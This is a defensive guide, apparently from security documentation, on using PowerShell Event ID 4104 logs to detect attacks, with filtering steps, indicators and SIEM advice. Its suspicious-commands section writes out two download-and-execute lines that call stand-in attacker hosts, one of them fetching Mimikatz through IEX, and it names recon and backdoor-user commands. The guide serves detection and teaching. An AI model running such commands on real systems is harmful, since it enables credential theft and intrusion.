Powershell Command Execution Event logs

Monitoring PowerShell Command Execution Logs for Threat Detection

PowerShell’s extensive capabilities make it a prime target for abuse by attackers. Monitoring PowerShell logs, particularly Event ID 4104, helps detect potential malicious activities by capturing detailed command execution events. Here's how to leverage these logs effectively.

Key Event ID: 4104 - PowerShell Command Execution

  • Log Location: Application and Services Logs → Microsoft → Windows → PowerShell → Operational

  • Task Category: Executing a Remote Command

  • Event Level: Verbose

Why It’s Important: Captures PowerShell commands executed in a session, providing visibility into potentially malicious actions.

Steps for Analyzing PowerShell Logs

1. Filter Logs

  • Event ID: Focus on 4104 to capture PowerShell command execution.

  • Event Level: Use Verbose to access detailed command data.

  • Date/Time: Narrow down to the specific incident timeframe to focus your analysis.

Filtering helps reduce noise from routine administrative tasks and highlights critical command execution events.

2. Identify Commands

  • Key Field: Look for the Creating Scriptblock field in the event details, which contains the executed PowerShell command.

  • Streamline Analysis: Ignore redundant entries like "prompt" commands unless context suggests they are significant.

3. Analyze Executed Commands

Focus on commands that indicate potential malicious activity, especially during post-exploitation phases.

Example Reconnaissance Commands:

  • whoami: Identifies the current user and their privileges.

  • Get-LocalUser: Lists all local user accounts.

  • Get-LocalGroup: Displays local groups, helping attackers identify privilege escalation opportunities.

Indicators of Malicious Activity

1. Suspicious Commands

Look for known malicious or suspicious command patterns, such as:

  • Downloading or executing scripts from the web:

    Invoke-WebRequest -Uri http://malicious.com/script.ps1 -OutFile script.ps1

  • Credential dumping (e.g., using Mimikatz):

    IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/mimikatz.ps1')

2. User and Domain Verification

  • Verify the user account running PowerShell commands.

  • Check if the account should have legitimate access to PowerShell.

  • Domain context: Analyze whether PowerShell commands are run from unusual domains or unauthorized devices.

3. Command Patterns

  • Frequent use of enumeration commands like Get-LocalUser and Get-LocalGroup.

  • Sequential execution of commands for lateral movement or privilege escalation.

Use Case Example

Scenario: An attacker gains initial access to a system. PowerShell logs show:

  1. whoami: Confirms current access level.

  2. Get-LocalUser/Get-LocalGroup: Enumerates local users and groups for privilege escalation.

  3. New-LocalUser: Creates a backdoor user for persistence.

Analysis: By correlating PowerShell logs with other security logs (e.g., authentication logs, file access logs), the security team identifies unauthorized access and isolates the system to prevent further damage.

Recommendations for Effective Monitoring

1. Enable PowerShell Logging

  • Enable all logging modes for PowerShell:

    • Module Logging: Tracks loaded PowerShell modules.

    • Script Block Logging: Captures detailed command execution (Event ID 4104).

    • Transcription Logging: Records full PowerShell session transcripts.

2. Automate Detection with SIEM

  • Set Alerts for Event ID 4104: Use a SIEM solution to automatically detect suspicious PowerShell commands.

  • Monitor Anomalous Patterns: Alert on uncommon PowerShell usage from specific users, devices, or IP ranges.

3. Correlate with Other Logs

  • Combine PowerShell logs with:

    • Authentication logs (Event ID 4624, 4625).

    • Scheduled Task logs (Event IDs 4698, 4702).

    • Process creation logs (Sysmon Event ID 1).

This provides a more comprehensive view of an incident.

4. Restrict PowerShell Usage

  • Limit PowerShell access to administrative accounts only.

  • Deploy Constrained Language Mode to restrict PowerShell functionality for non-admin users.

5. Use Threat Intelligence

  • Cross-reference executed commands with known Indicators of Compromise (IOCs).

  • Monitor for uncommon scripts or tools downloaded via PowerShell.

Key Points

Monitoring Event ID 4104 provides a window into potentially malicious PowerShell activity. By focusing on command execution patterns, user behavior, and script content, security teams can detect and respond to attacks involving PowerShell, such as reconnaissance, credential theft, and persistence. Combining these logs with other system logs enhances incident detection and response, helping to safeguard critical assets.

PreviousWindows Defender Event LogsNextBrowser Forensics

Last updated